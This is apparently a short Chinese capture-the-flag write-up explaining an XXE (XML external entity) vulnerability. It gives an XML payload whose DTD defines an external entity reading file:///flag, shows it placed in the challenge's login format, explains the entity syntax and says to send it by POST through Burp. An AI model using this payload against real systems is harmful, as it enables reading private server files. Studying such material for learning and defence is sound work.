xxe漏洞

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]> 这段是DTD文档类型定义
//<user>

　　　　&admin;

　　</username>

　　　　123456

　　</password>

</user> 这里是题目给的格式

注意这里是使用file://协议读取flag文件，并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。注意&admin后面要加 ; 因为是当作语句执行的。

用burp post方法传入以上代码

posted @ 2022-07-28 18:59 heartbeat111 阅读(33) 评论(0) 收藏举报

刷新页面返回顶部

heartbeat111